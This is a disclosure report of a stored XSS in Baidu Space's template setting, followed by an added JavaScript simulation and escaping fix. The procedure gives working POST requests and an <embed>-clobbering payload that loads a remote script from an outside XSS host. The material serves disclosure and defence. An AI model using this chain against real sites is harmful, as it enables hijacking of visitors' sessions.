The new version of Baidu Space does not filter for XSS at this injection point, but the usable payload is limited to 20 characters; once the quote and comment characters needed to break out of the string at both ends are subtracted, only 16 characters are left for code. The approach is still the old one: the payload has to reach out indirectly through eval(X) or eval(name). We will not consider those on their own first; instead we give priority to finding a location where an element with id="X" can be injected, and then...
1. The vulnerability is in the template selection of the new Baidu Space.
2. Vulnerable URL: http://hi.baidu.com/set/submit/theme
3. Vulnerable parameter: template
4. Cause: no input or output filtering is performed beyond a 20-character length limit.
5. Once custom content is injected, the template value appears in the following inline script on the space homepage and on every article page:
window.currentApplyedTpl = '{template content}';
6. Based on this, we can construct the malicious code as follows:
window.currentApplyedTpl = '';eval(XXX)//';   // XXX is an expression whose value we control
7. Candidate objects for XXX (length counted on the whole template value, limit 20):
';eval(qUserInfo.spaceName)//   <-- 29 characters, too long
';eval(M.innerHTML)//           <-- 21 characters, too long
';eval(M.title)//               <-- 17 characters
';eval(M.name)//                <-- 16 characters
';eval(M.alt)//                 <-- 15 characters
';eval(M.src)//                 <-- 15 characters
8. Given the above, we need to find a location where we can write an element with id="M" and an attribute (for example name="eval code") whose value we control.
However, testing shows that tags inside articles published on Baidu Space cannot carry an id attribute.
9. Fortunately, random testing found that the <embed></embed> tag can be used directly (a leftover from the old space?).
Fortunately, <embed></embed> also allows a title attribute to be written. (alt and name cannot be written, and src must start with http.)
10. Therefore, the exploit can be built with the following steps.
Procedure:
A. POST http://hi.baidu.com/set/submit/theme
POSTDATA:
template=';eval(M.title)//&bdstoken={my token}&qing_request_source=
B. Publish any article, then modify its content with the following POST:
POST http://hi.baidu.com/pub/submit/modifytext
POSTDATA (parameters other than content are omitted):
content=encodeURIComponent(<div><p><embed src="http://www.toolmao.com" id="M" title="(function(){var s=document.createElement('script');s.src='http://xsst.sinaapp.com/m.js';document.body.appendChild(s)})()"></p></div>)
C. The article page is now an XSS page: the <embed> with id="M" becomes window.M, and eval(M.title) runs the script loader stored in its title attribute.
Vulnerability proof
Test platform: Win7 + Chrome, IE
(Screenshot: effect in Chrome)
(Screenshot: effect in IE)
Solution:
1. Filter (or properly escape) the template content at http://hi.baidu.com/set/submit/theme before embedding it in the JavaScript string.
2. Does the new version of the space still need the <embed> tag at http://hi.baidu.com/pub/submit/modifytext? Even if it is kept, its id attribute can be stripped, as is already done for img.
Author: gainover
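The following is an added example and is not code from the original report or from Baidu. It models the injection point described in steps 5 and 6 (a template value pasted into a single-quoted JS string literal), checks the step 7 candidates against the 20-character limit, simulates the DOM-clobbering step from the procedure (an <embed id="M" title="..."> becoming window.M) by defining the same global by hand, and shows the escaping fix from the Solution section. The function names, the TEMPLATE_LIMIT constant and the marker-setting title string are my own constructions; only the identifier currentApplyedTpl, the payload skeleton and id="M" come from the report.

```javascript
// Added example, not code from the original report. Models the unfiltered
// template -> JS string literal injection, the 20-character budget, a hand-made
// stand-in for DOM clobbering, and the escaping fix.

const TEMPLATE_LIMIT = 20; // the only "filter" the report found on the theme endpoint

// Vulnerable rendering: the template value is inserted into a single-quoted
// JS string literal with no escaping, the pattern the report describes.
function buildPageScriptVulnerable(template) {
  return "window.currentApplyedTpl = '" + template.slice(0, TEMPLATE_LIMIT) + "';";
}

// Fixed rendering: emit a proper JS string literal. JSON.stringify escapes
// quotes, backslashes and control characters; "<" is escaped too so the value
// can never terminate the enclosing <script> element, and U+2028/U+2029 are
// escaped for engines that still treat them as line terminators.
function buildPageScriptFixed(template) {
  const literal = JSON.stringify(template.slice(0, TEMPLATE_LIMIT))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return "window.currentApplyedTpl = " + literal + ";";
}

// Wrap an attacker-controlled expression in the "';eval(...)//" skeleton and
// report whether the whole template value fits the length limit.
function payloadFor(expr) {
  const payload = "';eval(" + expr + ")//";
  return { payload, length: payload.length, fits: payload.length <= TEMPLATE_LIMIT };
}

// Simulate the victim page. `clobbered` stands in for DOM clobbering: in a
// browser, <embed id="M" title="..."> makes window.M the element, so M.title
// is the attribute string. Here the same globals are defined by hand.
// Returns true if the code stored in the clobbered attribute executed.
function simulateVictimPage(buildScript, template, clobbered) {
  const g = globalThis;
  if (typeof g.window === "undefined") g.window = g; // Node has no window object
  const saved = {};
  for (const [k, v] of Object.entries(clobbered)) { saved[k] = g[k]; g[k] = v; }
  g.__xssFired = false;
  try {
    // Run the generated inline script the way a page would (global scope).
    new Function(buildScript(template))();
  } catch (e) {
    // A SyntaxError or ReferenceError means the injected code did not run.
  } finally {
    for (const k of Object.keys(clobbered)) {
      if (saved[k] === undefined) delete g[k]; else g[k] = saved[k];
    }
  }
  return g.__xssFired === true;
}

// Constructed stand-in for the report's title attribute: instead of loading a
// remote m.js, the payload just sets a marker so execution can be observed.
const CLOBBERED_EMBED = { M: { title: "globalThis.__xssFired = true" } };

function demo() {
  const candidates = ["qUserInfo.spaceName", "M.innerHTML", "M.title", "M.name", "M.alt", "M.src"];
  for (const c of candidates) {
    const p = payloadFor(c);
    console.log(p.payload.padEnd(30), p.length, p.fits ? "fits" : "too long");
  }
  const t = payloadFor("M.title").payload;
  console.log("vulnerable page executes payload:", simulateVictimPage(buildPageScriptVulnerable, t, CLOBBERED_EMBED));
  console.log("fixed page executes payload:     ", simulateVictimPage(buildPageScriptFixed, t, CLOBBERED_EMBED));
  console.log("fixed page stores value verbatim:", globalThis.window.currentApplyedTpl === t);
}

if (typeof require !== "undefined" && require.main === module) demo();
```

Run it with node; the candidate table reproduces the lengths listed in step 7, the vulnerable builder lets the 17-character payload execute the code sitting in M.title, and the fixed builder stores the same template value as an inert string.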